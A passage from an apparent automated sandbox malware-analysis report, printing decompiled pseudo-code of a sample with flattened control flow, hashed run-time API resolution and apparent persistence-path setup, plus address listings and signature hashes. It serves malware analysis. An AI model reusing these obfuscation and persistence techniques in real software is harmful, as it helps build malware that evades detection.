                                                        										_v124 = _v124 | 0x1ba4dd87;
                                                        										_v124 = _v124 + 0x949;
                                                        										_t392 = 0x38e38e39 * _v124 >> 0x20 >> 4;
                                                        										_v124 = _t392;
                                                        										_v124 = _v124 ^ 0x47e6e439;
                                                        										_v124 = _v124 ^ 0x2b9fcd36;
                                                        										_v124 = _v124 >> 7;
                                                        										_v124 = _v124 << 0xa;
                                                        										_v124 = _v124 + 0xded3;
                                                        										_v124 = _v124 ^ 0x60dbe593;
                                                        										_t221 =  *_t438();
                                                        										_t446 = _t392;
                                                        										_t327 = _t221 + _v124 + _t418;
                                                        										asm("adc ebp, 0x0");
                                                        										goto L137;
                                                        									} else {
                                                        										__eflags = _t204 - 0x3251fefe;
                                                        										if(__eflags > 0) {
                                                        											__eflags = _t204 - 0x32f9862d;
                                                        											if(_t204 != 0x32f9862d) {
                                                        												goto L44;
                                                        											} else {
                                                        												_t211 = E003FB2E0();
                                                        												goto L128;
                                                        											}
                                                        										} else {
                                                        											if(__eflags == 0) {
                                                        												return E003F8740(_t392, _t446);
                                                        											} else {
                                                        												__eflags = _t204 - 0x31c22ee5;
                                                        												if(_t204 == 0x31c22ee5) {
                                                        													E003F80A0(_t392);
                                                        													_t360 =  *0x3fe54c; // 0x55f0b0
                                                        													__eflags =  *(_t360 + 0x220);
                                                        													_t204 =  !=  ? 0x2b2ba899 : 0xc039e9a;
                                                        													goto L3;
                                                        												} else {
                                                        													__eflags = _t204 - 0x320a2fc0;
                                                        													if(_t204 != 0x320a2fc0) {
                                                        														goto L44;
                                                        													} else {
                                                        														_v36 = E003F4770(_t327, _t446);
                                                        														_t204 = 0x99d9f33;
                                                        														goto L3;
                                                        													}
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							} else {
                                                        								if(__eflags == 0) {
                                                        									_t237 =  *0x3fe494;
                                                        									__eflags = _t237;
                                                        									if(_t237 == 0) {
                                                        										_t242 = E003F3F00(0x9bab0b12);
                                                        										_t392 = 0x7facde30;
                                                        										_t237 = E003F3E60(_t327, _t242, 0x7facde30, _t446);
                                                        										 *0x3fe494 = _t237;
                                                        									}
                                                        									_t442 =  *_t237();
                                                        									_t239 =  *0x3fdf30;
                                                        									__eflags = _t239;
                                                        									if(_t239 == 0) {
                                                        										_t241 = E003F3F00(0x9bab0b12);
                                                        										_t392 = 0x5010a54d;
                                                        										_t239 = E003F3E60(_t327, _t241, 0x5010a54d, _t446);
                                                        										 *0x3fdf30 = _t239;
                                                        									}
                                                        									 *_t239(_t442, 0, _v24);
                                                        									_t204 = 0xc403738;
                                                        									goto L2;
                                                        								} else {
                                                        									__eflags = _t204 - 0x28a63df9;
                                                        									if(__eflags > 0) {
                                                        										__eflags = _t204 - 0x2e428786;
                                                        										if(__eflags > 0) {
                                                        											__eflags = _t204 - 0x2e7e0c52;
                                                        											if(_t204 != 0x2e7e0c52) {
                                                        												goto L44;
                                                        											} else {
                                                        												E003F9050();
                                                        												_t204 = 0x2609a3b;
                                                        												goto L3;
                                                        											}
                                                        										} else {
                                                        											if(__eflags == 0) {
                                                        												_t211 = E003F72D0(_t327);
                                                        												__eflags = _t211;
                                                        												if(_t211 == 0) {
                                                        													goto L128;
                                                        												} else {
                                                        													_t204 = 0xb7b0115;
                                                        													goto L3;
                                                        												}
                                                        											} else {
                                                        												__eflags = _t204 - 0x28af9e25;
                                                        												if(_t204 == 0x28af9e25) {
                                                        													return E003F8D40(_t446);
                                                        												} else {
                                                        													__eflags = _t204 - 0x2b2ba899;
                                                        													if(_t204 != 0x2b2ba899) {
                                                        														goto L44;
                                                        													} else {
                                                        														E003F8970();
                                                        														_t204 = 0xc039e9a;
                                                        														goto L3;
                                                        													}
                                                        												}
                                                        											}
                                                        										}
                                                        									} else {
                                                        										if(__eflags == 0) {
                                                        											_t211 = E003F8BB0();
                                                        											__eflags = _t211;
                                                        											if(_t211 == 0) {
                                                        												L128:
                                                        												return _t211;
                                                        											} else {
                                                        												_t204 = 0x31c22ee5;
                                                        												goto L3;
                                                        											}
                                                        										} else {
                                                        											__eflags = _t204 - 0x22e7b396;
                                                        											if(__eflags > 0) {
                                                        												__eflags = _t204 - 0x26a7c4f3;
                                                        												if(_t204 != 0x26a7c4f3) {
                                                        													goto L44;
                                                        												} else {
                                                        													_t246 = E003F9270();
                                                        													asm("sbb eax, eax");
                                                        													_t204 = ( ~_t246 & 0xf6ea3d42) + 0xb765cf9;
                                                        													goto L3;
                                                        												}
                                                        											} else {
                                                        												if(__eflags == 0) {
                                                        													_v40 = E003F53D0(_t327, _t446);
                                                        													_t204 = 0x320a2fc0;
                                                        													goto L3;
                                                        												} else {
                                                        													__eflags = _t204 - 0x1cd4381f;
                                                        													if(_t204 == 0x1cd4381f) {
                                                        														_t392 =  &_v100;
                                                        														_v104 = E003F3310(0x3fd320, _t392);
                                                        														E003F1840( &_v104);
                                                        														E003F3460(_t250);
                                                        														_t204 = 0x1b08adb;
                                                        														L2:
                                                        														_t426 = 0x3251fefe;
                                                        														goto L3;
                                                        													} else {
                                                        														__eflags = _t204 - 0x2200eb3b;
                                                        														if(_t204 != 0x2200eb3b) {
                                                        															goto L44;
                                                        														} else {
                                                        															E003F8E80();
                                                        															_t204 = 0x2e7e0c52;
                                                        															goto L3;
                                                        														}
                                                        													}
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							goto L150;
                                                        							L44:
                                                        							__eflags = _t204 - 0x293c010e;
                                                        						} while (_t204 != 0x293c010e);
                                                        						return _t204;
                                                        						goto L150;
                                                        					}
                                                        				}
                                                        			}


























































































                                                        0x003f65e6
                                                        0x003f65ed
                                                        0x003f65f1
                                                        0x003f65f7
                                                        0x003f65fd
                                                        0x003f65fd
                                                        0x003f65fd
                                                        0x003f6601
                                                        0x003f6601
                                                        0x003f6601
                                                        0x003f6610
                                                        0x003f6610
                                                        0x003f6610
                                                        0x003f6610
                                                        0x003f6615
                                                        0x00000000
                                                        0x00000000
                                                        0x003f661b
                                                        0x003f6bc2
                                                        0x003f6bc9
                                                        0x003f6bd0
                                                        0x00000000
                                                        0x003f6621
                                                        0x003f6621
                                                        0x003f6626
                                                        0x003f6a44
                                                        0x003f6a49
                                                        0x003f6b56
                                                        0x003f6b5b
                                                        0x003f6ba4
                                                        0x003f6ba9
                                                        0x00000000
                                                        0x003f6baf
                                                        0x003f6bb4
                                                        0x003f6bb8
                                                        0x00000000
                                                        0x003f6bb8
                                                        0x003f6b5d
                                                        0x003f6b5d
                                                        0x003f6b9a
                                                        0x00000000
                                                        0x003f6b5f
                                                        0x003f6b5f
                                                        0x003f6b64
                                                        0x003f6b8b
                                                        0x003f6b90
                                                        0x00000000
                                                        0x003f6b66
                                                        0x003f6b66
                                                        0x003f6b6b
                                                        0x00000000
                                                        0x003f6b71
                                                        0x003f6b78
                                                        0x003f6b7d
                                                        0x00000000
                                                        0x003f6b7d
                                                        0x003f6b6b
                                                        0x003f6b64
                                                        0x003f6b5d
                                                        0x003f6a4f
                                                        0x003f6a4f
                                                        0x003f6b14
                                                        0x003f6b19
                                                        0x003f6b1e
                                                        0x003f6b23
                                                        0x003f6b27
                                                        0x003f6b29
                                                        0x003f6b30
                                                        0x003f6b35
                                                        0x003f6b3c
                                                        0x003f6b41
                                                        0x003f6b41
                                                        0x003f6b48
                                                        0x003f6b4a
                                                        0x003f6b4c
                                                        0x00000000
                                                        0x003f6a55
                                                        0x003f6a55
                                                        0x003f6a5a
                                                        0x003f6aff
                                                        0x003f6b04
                                                        0x00000000
                                                        0x003f6b0a
                                                        0x003f6b0a
                                                        0x00000000
                                                        0x003f6b0a
                                                        0x003f6a60
                                                        0x003f6a60
                                                        0x003f6af0
                                                        0x003f6af5
                                                        0x00000000
                                                        0x003f6a66
                                                        0x003f6a66
                                                        0x003f6a6b
                                                        0x003f6ac3
                                                        0x003f6ac8
                                                        0x003f6aca
                                                        0x003f6acc
                                                        0x003f6acf
                                                        0x003f6ad4
                                                        0x003f6ada
                                                        0x003f6ade
                                                        0x003f6ae2
                                                        0x003f6ae2
                                                        0x00000000
                                                        0x003f6a6d
                                                        0x003f6a6d
                                                        0x003f6a72
                                                        0x00000000
                                                        0x003f6a78
                                                        0x003f6a7c
                                                        0x003f6a81
                                                        0x003f6a83
                                                        0x003f6ab5
                                                        0x003f6a85
                                                        0x003f6a85
                                                        0x003f6a89
                                                        0x003f6a99
                                                        0x003f6a9d
                                                        0x003f6aa2
                                                        0x003f6aa7
                                                        0x003f6aab
                                                        0x003f6aab
                                                        0x00000000
                                                        0x003f6a83
                                                        0x003f6a72
                                                        0x003f6a6b
                                                        0x003f6a60
                                                        0x003f6a5a
                                                        0x003f6a4f
                                                        0x003f662c
                                                        0x003f662c
                                                        0x003f68ce
                                                        0x003f68d0
                                                        0x003f68e7
                                                        0x003f68ef
                                                        0x003f68f7
                                                        0x003f68fc
                                                        0x003f6906
                                                        0x003f690a
                                                        0x003f6912
                                                        0x003f6917
                                                        0x003f691b
                                                        0x003f6985
                                                        0x003f6985
                                                        0x003f691d
                                                        0x003f6923
                                                        0x003f6925
                                                        0x003f693f
                                                        0x003f693f
                                                        0x003f6945
                                                        0x003f694d
                                                        0x003f6955
                                                        0x003f695a
                                                        0x003f6964
                                                        0x003f6968
                                                        0x003f6970
                                                        0x003f6981
                                                        0x003f6981
                                                        0x003f6987
                                                        0x003f698f
                                                        0x003f6997
                                                        0x003f699c
                                                        0x003f69a6
                                                        0x003f69aa
                                                        0x003f69b6
                                                        0x003f69bc
                                                        0x003f69be
                                                        0x003f69c0
                                                        0x003f69c7
                                                        0x003f69cc
                                                        0x003f69d8
                                                        0x003f69da
                                                        0x003f69da
                                                        0x003f69e0
                                                        0x003f69e9
                                                        0x003f69eb
                                                        0x003f69f0
                                                        0x003f69fc
                                                        0x003f6a01
                                                        0x003f6a03
                                                        0x003f6a0a
                                                        0x003f6a0f
                                                        0x003f6a16
                                                        0x003f6a1b
                                                        0x003f6a1b
                                                        0x003f6a20
                                                        0x003f6a22
                                                        0x003f6a24
                                                        0x003f6fc8
                                                        0x003f6fc8
                                                        0x00000000
                                                        0x003f6a2a
                                                        0x003f6a2a
                                                        0x003f6a34
                                                        0x003f6a34
                                                        0x003f6a38
                                                        0x003f6a3d
                                                        0x00000000
                                                        0x003f6a2c
                                                        0x003f6a2c
                                                        0x003f6a2e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003f6a2e
                                                        0x003f6a2a
                                                        0x003f69f2
                                                        0x003f69f2
                                                        0x003f65fd
                                                        0x003f65fd
                                                        0x003f65fd
                                                        0x003f6601
                                                        0x003f6601
                                                        0x003f6601
                                                        0x00000000
                                                        0x003f6606
                                                        0x003f6601
                                                        0x003f65fd
                                                        0x003f68d2
                                                        0x003f68d2
                                                        0x00000000
                                                        0x003f68d2
                                                        0x003f6632
                                                        0x003f6632
                                                        0x003f6637
                                                        0x003f6838
                                                        0x003f683d
                                                        0x003f68b6
                                                        0x003f68bb
                                                        0x00000000
                                                        0x003f68bd
                                                        0x003f68bd
                                                        0x003f68c2
                                                        0x00000000
                                                        0x003f68c2
                                                        0x003f683f
                                                        0x003f683f
                                                        0x003f68a7
                                                        0x003f68ac
                                                        0x00000000
                                                        0x003f6841
                                                        0x003f6841
                                                        0x003f6846
                                                        0x003f6898
                                                        0x003f689d
                                                        0x00000000
                                                        0x003f6848
                                                        0x003f6848
                                                        0x003f684d
                                                        0x00000000
                                                        0x003f6853
                                                        0x003f6853
                                                        0x003f6858
                                                        0x003f685e
                                                        0x003f6860
                                                        0x003f687b
                                                        0x003f688c
                                                        0x003f6862
                                                        0x003f6862
                                                        0x003f6873
                                                        0x003f6873
                                                        0x00000000
                                                        0x003f6860
                                                        0x003f684d
                                                        0x003f6846
                                                        0x003f683f
                                                        0x003f663d
                                                        0x003f663d
                                                        0x003f6811
                                                        0x003f6819
                                                        0x003f681e
                                                        0x003f682a
                                                        0x003f682e
                                                        0x00000000
                                                        0x003f6643
                                                        0x003f6643
                                                        0x003f6648
                                                        0x003f67b4
                                                        0x003f67b9
                                                        0x003f6802
                                                        0x003f6807
                                                        0x00000000
                                                        0x003f67bb
                                                        0x003f67bb
                                                        0x003f67c0
                                                        0x00000000
                                                        0x003f67c6
                                                        0x003f67c6
                                                        0x003f67ce
                                                        0x003f67d3
                                                        0x003f67d5
                                                        0x003f6ae6
                                                        0x003f6ae6
                                                        0x003f67db
                                                        0x003f67dd
                                                        0x003f67e2
                                                        0x003f67e6
                                                        0x003f67eb
                                                        0x003f67ed
                                                        0x003f67f3
                                                        0x003f67f6
                                                        0x003f67f6
                                                        0x003f67ed
                                                        0x00000000
                                                        0x003f67d5
                                                        0x003f67c0
                                                        0x003f664e
                                                        0x003f664e
                                                        0x003f6675
                                                        0x003f6681
                                                        0x003f668a
                                                        0x003f6697
                                                        0x003f669c
                                                        0x003f669f
                                                        0x003f66a1
                                                        0x003f672a
                                                        0x003f672f
                                                        0x003f6734
                                                        0x003f6738
                                                        0x003f673f
                                                        0x003f6744
                                                        0x003f6746
                                                        0x003f677f
                                                        0x003f677f
                                                        0x003f6748
                                                        0x003f6757
                                                        0x003f675c
                                                        0x003f675f
                                                        0x003f6763
                                                        0x003f676a
                                                        0x003f6777
                                                        0x003f677b
                                                        0x003f677b
                                                        0x003f6786
                                                        0x003f6790
                                                        0x003f6795
                                                        0x003f6798
                                                        0x003f679c
                                                        0x003f67a5
                                                        0x003f67a7
                                                        0x003f67ac
                                                        0x003f66a7
                                                        0x003f66a7
                                                        0x003f66ac
                                                        0x003f66b0
                                                        0x003f66b7
                                                        0x003f66bc
                                                        0x003f66be
                                                        0x003f66f5
                                                        0x003f66f5
                                                        0x003f66c0
                                                        0x003f66cf
                                                        0x003f66d4
                                                        0x003f66d7
                                                        0x003f66db
                                                        0x003f66f1
                                                        0x003f66f1
                                                        0x003f66fc
                                                        0x003f6706
                                                        0x003f670b
                                                        0x003f670e
                                                        0x003f6712
                                                        0x003f671b
                                                        0x003f671d
                                                        0x003f6722
                                                        0x003f6722
                                                        0x003f6601
                                                        0x003f6601
                                                        0x003f6601
                                                        0x00000000
                                                        0x003f6601
                                                        0x003f6650
                                                        0x003f6655
                                                        0x003f666e
                                                        0x00000000
                                                        0x003f6657
                                                        0x003f665c
                                                        0x00000000
                                                        0x003f6662
                                                        0x003f6662
                                                        0x003f6667
                                                        0x00000000
                                                        0x003f6667
                                                        0x003f665c
                                                        0x003f6655
                                                        0x003f664e
                                                        0x003f6648
                                                        0x003f663d
                                                        0x003f6637
                                                        0x003f662c
                                                        0x003f6626
                                                        0x00000000
                                                        0x003f661b
                                                        0x003f6bda
                                                        0x003f6bdf
                                                        0x003f6d5f
                                                        0x003f6d64
                                                        0x003f6fd2
                                                        0x003f6fd7
                                                        0x003f703a
                                                        0x003f703f
                                                        0x00000000
                                                        0x003f7045
                                                        0x003f7045
                                                        0x003f704a
                                                        0x003f7050
                                                        0x003f7057
                                                        0x00000000
                                                        0x003f7057
                                                        0x003f6fd9
                                                        0x003f6fd9
                                                        0x003f701a
                                                        0x003f7022
                                                        0x003f7029
                                                        0x003f7030
                                                        0x00000000
                                                        0x003f6fdb
                                                        0x003f6fdb
                                                        0x003f6fe0
                                                        0x003f700b
                                                        0x003f7010
                                                        0x00000000
                                                        0x003f6fe2
                                                        0x003f6fe2
                                                        0x003f6fe7
                                                        0x00000000
                                                        0x003f6fed
                                                        0x003f6fed
                                                        0x003f6ff2
                                                        0x003f6ff4
                                                        0x00000000
                                                        0x003f6ffa
                                                        0x003f6ffa
                                                        0x00000000
                                                        0x003f6ffa
                                                        0x003f6ff4
                                                        0x003f6fe7
                                                        0x003f6fe0
                                                        0x003f6fd9
                                                        0x003f6d6a
                                                        0x003f6d6a
                                                        0x003f6dda
                                                        0x003f6de7
                                                        0x003f6df5
                                                        0x003f6e00
                                                        0x003f6e04
                                                        0x003f6e0c
                                                        0x003f6e19
                                                        0x003f6e1d
                                                        0x003f6e25
                                                        0x003f6e3d
                                                        0x003f6e41
                                                        0x003f6e49
                                                        0x003f6e51
                                                        0x003f6e59
                                                        0x003f6e6a
                                                        0x003f6e6e
                                                        0x003f6e76
                                                        0x003f6e7e
                                                        0x003f6e83
                                                        0x003f6e88
                                                        0x003f6e90
                                                        0x003f6e9c
                                                        0x003f6ea0
                                                        0x003f6f39
                                                        0x003f6f39
                                                        0x003f6ea6
                                                        0x003f6eac
                                                        0x003f6eae
                                                        0x003f6ec8
                                                        0x003f6ec8
                                                        0x003f6ece
                                                        0x003f6edb
                                                        0x003f6ee3
                                                        0x003f6ef4
                                                        0x003f6ef8
                                                        0x003f6f00
                                                        0x003f6f08
                                                        0x003f6f0d
                                                        0x003f6f12
                                                        0x003f6f1a
                                                        0x003f6f22
                                                        0x003f6f35
                                                        0x003f6f35
                                                        0x003f6f3b
                                                        0x003f6f41
                                                        0x003f6f43
                                                        0x003f6f5b
                                                        0x003f6f5d
                                                        0x003f6f5d
                                                        0x003f6f63
                                                        0x003f6f70
                                                        0x003f6f78
                                                        0x003f6f86
                                                        0x003f6f89
                                                        0x003f6f8d
                                                        0x003f6f95
                                                        0x003f6f9d
                                                        0x003f6fa2
                                                        0x003f6fa7
                                                        0x003f6faf
                                                        0x003f6fb7
                                                        0x003f6fbb
                                                        0x003f6fc3
                                                        0x003f6fc5
                                                        0x00000000
                                                        0x003f6d6c
                                                        0x003f6d6c
                                                        0x003f6d71
                                                        0x003f6dc2
                                                        0x003f6dc7
                                                        0x00000000
                                                        0x003f6dcd
                                                        0x003f6dcd
                                                        0x00000000
                                                        0x003f6dcd
                                                        0x003f6d73
                                                        0x003f6d73
                                                        0x003f707a
                                                        0x003f6d79
                                                        0x003f6d79
                                                        0x003f6d7e
                                                        0x003f6d9e
                                                        0x003f6da3
                                                        0x003f6dae
                                                        0x003f6dba
                                                        0x00000000
                                                        0x003f6d80
                                                        0x003f6d80
                                                        0x003f6d85
                                                        0x00000000
                                                        0x003f6d8b
                                                        0x003f6d90
                                                        0x003f6d94
                                                        0x00000000
                                                        0x003f6d94
                                                        0x003f6d85
                                                        0x003f6d7e
                                                        0x003f6d73
                                                        0x003f6d71
                                                        0x003f6d6a
                                                        0x003f6be5
                                                        0x003f6be5
                                                        0x003f6d00
                                                        0x003f6d05
                                                        0x003f6d07
                                                        0x003f6d0e
                                                        0x003f6d13
                                                        0x003f6d1a
                                                        0x003f6d1f
                                                        0x003f6d1f
                                                        0x003f6d26
                                                        0x003f6d28
                                                        0x003f6d2d
                                                        0x003f6d2f
                                                        0x003f6d36
                                                        0x003f6d3b
                                                        0x003f6d42
                                                        0x003f6d47
                                                        0x003f6d47
                                                        0x003f6d53
                                                        0x003f6d55
                                                        0x00000000
                                                        0x003f6beb
                                                        0x003f6beb
                                                        0x003f6bf0
                                                        0x003f6ca1
                                                        0x003f6ca6
                                                        0x003f6ce6
                                                        0x003f6ceb
                                                        0x00000000
                                                        0x003f6cf1
                                                        0x003f6cf1
                                                        0x003f6cf6
                                                        0x00000000
                                                        0x003f6cf6
                                                        0x003f6ca8
                                                        0x003f6ca8
                                                        0x003f6ccf
                                                        0x003f6cd4
                                                        0x003f6cd6
                                                        0x00000000
                                                        0x003f6cdc
                                                        0x003f6cdc
                                                        0x00000000
                                                        0x003f6cdc
                                                        0x003f6caa
                                                        0x003f6caa
                                                        0x003f6caf
                                                        0x003f706d
                                                        0x003f6cb5
                                                        0x003f6cb5
                                                        0x003f6cba
                                                        0x00000000
                                                        0x003f6cc0
                                                        0x003f6cc0
                                                        0x003f6cc5
                                                        0x00000000
                                                        0x003f6cc5
                                                        0x003f6cba
                                                        0x003f6caf
                                                        0x003f6ca8
                                                        0x003f6bf6
                                                        0x003f6bf6
                                                        0x003f6c8a
                                                        0x003f6c8f
                                                        0x003f6c91
                                                        0x003f6dd2
                                                        0x003f6dd9
                                                        0x003f6c97
                                                        0x003f6c97
                                                        0x00000000
                                                        0x003f6c97
                                                        0x003f6bfc
                                                        0x003f6bfc
                                                        0x003f6c01
                                                        0x003f6c67
                                                        0x003f6c6c
                                                        0x00000000
                                                        0x003f6c72
                                                        0x003f6c72
                                                        0x003f6c79
                                                        0x003f6c80
                                                        0x00000000
                                                        0x003f6c80
                                                        0x003f6c03
                                                        0x003f6c03
                                                        0x003f6c59
                                                        0x003f6c5d
                                                        0x00000000
                                                        0x003f6c05
                                                        0x003f6c05
                                                        0x003f6c0a
                                                        0x003f6c26
                                                        0x003f6c3a
                                                        0x003f6c3e
                                                        0x003f6c45
                                                        0x003f6c4a
                                                        0x003f6601
                                                        0x003f6601
                                                        0x00000000
                                                        0x003f6c0c
                                                        0x003f6c0c
                                                        0x003f6c11
                                                        0x00000000
                                                        0x003f6c17
                                                        0x003f6c17
                                                        0x003f6c1c
                                                        0x00000000
                                                        0x003f6c1c
                                                        0x003f6c11
                                                        0x003f6c0a
                                                        0x003f6c03
                                                        0x003f6c01
                                                        0x003f6bf6
                                                        0x003f6bf0
                                                        0x003f6be5
                                                        0x00000000
                                                        0x003f68d4
                                                        0x003f68d4
                                                        0x003f68d4
                                                        0x003f68e6
                                                        0x00000000
                                                        0x003f68e6
                                                        0x003f6601

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountTick
                                                        • String ID: 9G$9G$Cr7$Cr7$IK
                                                        • API String ID: 536389180-1575203827
                                                        • Opcode ID: 607e78f303cf13481d07b84c29c304bc9b21563ec32509d0b5ea9d8acb6c226b
                                                        • Instruction ID: b58126c42c69f5085d8afc8ee994e64e562a6eac2c2ee168a25f694b8cb945ff
                                                        • Opcode Fuzzy Hash: 607e78f303cf13481d07b84c29c304bc9b21563ec32509d0b5ea9d8acb6c226b
                                                        • Instruction Fuzzy Hash: 4232C67160830D8BCB16EF79948613F76E5ABA0794F24492EF685CB362DA34CD448BD3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 59%
                                                        			E003F78B0() {
                                                        				char _v520;
                                                        				char _v524;
                                                        				signed int _v528;
                                                        				intOrPtr _v532;
                                                        				signed int _v536;
                                                        				signed int _v540;
                                                        				unsigned int _v544;
                                                        				signed int _v548;
                                                        				signed int _v552;
                                                        				intOrPtr _v560;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				intOrPtr* _t74;
                                                        				intOrPtr* _t76;
                                                        				intOrPtr* _t78;
                                                        				intOrPtr* _t80;
                                                        				intOrPtr* _t84;
                                                        				signed int _t85;
                                                        				signed int _t89;
                                                        				void* _t91;
                                                        				intOrPtr* _t98;
                                                        				intOrPtr* _t100;
                                                        				intOrPtr _t145;
                                                        				intOrPtr* _t148;
                                                        				intOrPtr* _t150;
                                                        				char _t157;
                                                        				intOrPtr _t158;
                                                        				short* _t159;
                                                        				signed int _t160;
                                                        				void* _t162;
                                                        				void* _t163;
                                                        				signed int* _t164;
                                                        				void* _t166;
                                                        
                                                        				_t164 =  &_v552;
                                                        				_v528 = 0x6831;
                                                        				_v528 = _v528 >> 0xf;
                                                        				_v528 = _v528 ^ 0x80000001;
                                                        				_v540 = 0x327e;
                                                        				_v540 = _v540 + 0xffffab47;
                                                        				_v540 = _v540 | 0x0907f9bb;
                                                        				_v540 = _v540 ^ 0xfffffdff;
                                                        				_v536 = 0xabbb;
                                                        				_v536 = _v536 + 0x21b1;
                                                        				_v536 = _v536 ^ 0x0000cd6c;
                                                        				_v552 = 0x2b65;
                                                        				_v552 = _v552 + 0xffff264b;
                                                        				_v552 = _v552 ^ 0xa26386a9;
                                                        				_v552 = _v552 >> 0xa;
                                                        				_v552 = _v552 | 0xc292eff0;
                                                        				_v552 = _v552 ^ 0xc297eff7;
                                                        				_v544 = 0x4147;
                                                        				_v544 = _v544 >> 4;
                                                        				_v544 = _v544 + 0x49ca;
                                                        				_v544 = _v544 ^ 0x00004dde;
                                                        				_v548 = 0x16b6;
                                                        				_v532 = 0;
                                                        				_v548 = 0x3e0f83e1 * _v548 >> 0x20 >> 3;
                                                        				_v548 = _v548 + 0xffff3e41;
                                                        				_v548 = _v548 ^ 0xffff3ef0;
                                                        				_t157 = _v524;
                                                        				_t160 = 0x251b1a18;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t166 = _t160 - 0x22925463;
                                                        						if(_t166 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t166 == 0) {
                                                        							_t162 = E003F34C0(0x3fd940);
                                                        							_t74 =  *0x3fe158;
                                                        							if(_t74 == 0) {
                                                        								_t74 = E003F3E60(_t112, E003F3F00(0xc6fbcd74), 0xba71dd03, _t163);
                                                        								 *0x3fe158 = _t74;
                                                        							}
                                                        							_t145 =  *0x3fe54c; // 0x55f0b0
                                                        							_t59 = _t145 + 0x260; // 0x55f310
                                                        							_t60 = _t145 + 0x18; // 0x55f0c8
                                                        							 *_t74( &_v520, 0x104, _t162, _t60, _t59);
                                                        							_t76 =  *0x3fe494;
                                                        							_t164 =  &(_t164[5]);
                                                        							if(_t76 == 0) {
                                                        								_t76 = E003F3E60(_t112, E003F3F00(0x9bab0b12), 0x7facde30, _t163);
                                                        								 *0x3fe494 = _t76;
                                                        							}
                                                        							_t112 =  *_t76();
                                                        							_t78 =  *0x3fdf30;
                                                        							if(_t78 == 0) {
                                                        								_t78 = E003F3E60(_t112, E003F3F00(0x9bab0b12), 0x5010a54d, _t163);
                                                        								 *0x3fdf30 = _t78;
                                                        							}
                                                        							 *_t78(_t112, 0, _t162);
                                                        							_t160 = 0xcb26f9d;
                                                        							continue;
                                                        						} else {
                                                        							if(_t160 == 0x1dc498f) {
                                                        								_t80 =  *0x3fdcf4; // 0x0
                                                        								if(_t80 == 0) {
                                                        									_t80 = E003F3E60(_t112, E003F3F00(0x26f5757c), 0x57afd2ae, _t163);
                                                        									 *0x3fdcf4 = _t80;
                                                        								}
                                                        								 *_t80(_v524);
                                                        								return _v536;
                                                        							} else {
                                                        								if(_t160 == 0xcb26f9d) {
                                                        									_t158 =  *0x3fe54c; // 0x55f0b0
                                                        									_t159 = _t158 + 0x260;
                                                        									while( *_t159 != 0x5c) {
                                                        										_t159 = _t159 + 2;
                                                        									}
                                                        									_t157 = _t159 + 2;
                                                        									_t160 = 0x3b2cc327;
                                                        									continue;
                                                        								} else {
                                                        									if(_t160 != 0xe3d60ec) {
                                                        										goto L30;
                                                        									} else {
                                                        										_t84 =  *0x3fe35c;
                                                        										if(_t84 == 0) {
                                                        											_t84 = E003F3E60(_t112, E003F3F00(0x9bab0b12), 0x24b1f8f2, _t163);
                                                        											 *0x3fe35c = _t84;
                                                        										}
                                                        										_t85 =  *_t84( &_v520);
                                                        										_t148 =  *0x3fe264; // 0x0
                                                        										_v536 = 2 + _t85 * 2;
                                                        										if(_t148 == 0) {
                                                        											_t148 = E003F3E60(_t112, E003F3F00(0x26f5757c), 0x63466134, _t163);
                                                        											 *0x3fe264 = _t148;
                                                        										}
                                                        										_t89 =  *_t148(_v528, _t157, _v548, _v552,  &_v524, _v536);
                                                        										_t160 = 0x1dc498f;
                                                        										asm("sbb ebx, ebx");
                                                        										_t112 =  ~_t89 + 1;
                                                        										_v560 =  ~_t89 + 1;
                                                        										continue;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L36:
                                                        					}
                                                        					if(_t160 == 0x251b1a18) {
                                                        						_t160 = 0x22925463;
                                                        						goto L1;
                                                        					} else {
                                                        						if(_t160 == 0x3b2cc327) {
                                                        							_t91 = E003F34C0(0x3fd9c0);
                                                        							_t150 =  *0x3fdbcc; // 0x0
                                                        							_t163 = _t91;
                                                        							if(_t150 == 0) {
                                                        								_t150 = E003F3E60(_t112, E003F3F00(0x26f5757c), 0xc7fc2e0, _t163);
                                                        								 *0x3fdbcc = _t150;
                                                        							}
                                                        							 *_t150(_v528, _t163, _v540, 0, _v536, _v552, 0,  &_v524, 0);
                                                        							asm("sbb esi, esi");
                                                        							_t98 =  *0x3fe494;
                                                        							_t160 = (_t160 & 0x1c0fc192) + 0xe3d60ec;
                                                        							if(_t98 == 0) {
                                                        								_t98 = E003F3E60(_t112, E003F3F00(0x9bab0b12), 0x7facde30, _t163);
                                                        								 *0x3fe494 = _t98;
                                                        							}
                                                        							_t112 =  *_t98();
                                                        							_t100 =  *0x3fdf30;
                                                        							if(_t100 == 0) {
                                                        								_t100 = E003F3E60(_t112, E003F3F00(0x9bab0b12), 0x5010a54d, _t163);
                                                        								 *0x3fdf30 = _t100;
                                                        							}
                                                        							 *_t100(_t112, 0, _t163);
                                                        						}
                                                        						goto L30;
                                                        					}
                                                        					goto L36;
                                                        					L30:
                                                        				} while (_t160 != 0x2a4d227e);
                                                        				return _v532;
                                                        				goto L36;
                                                        			}




































                                                        0x003f78b0
                                                        0x003f78ba
                                                        0x003f78c4
                                                        0x003f78c9
                                                        0x003f78d1
                                                        0x003f78d9
                                                        0x003f78e1
                                                        0x003f78e9
                                                        0x003f78f1
                                                        0x003f78f9
                                                        0x003f7901
                                                        0x003f7909
                                                        0x003f7911
                                                        0x003f7919
                                                        0x003f7921
                                                        0x003f7926
                                                        0x003f792e
                                                        0x003f7936
                                                        0x003f793e
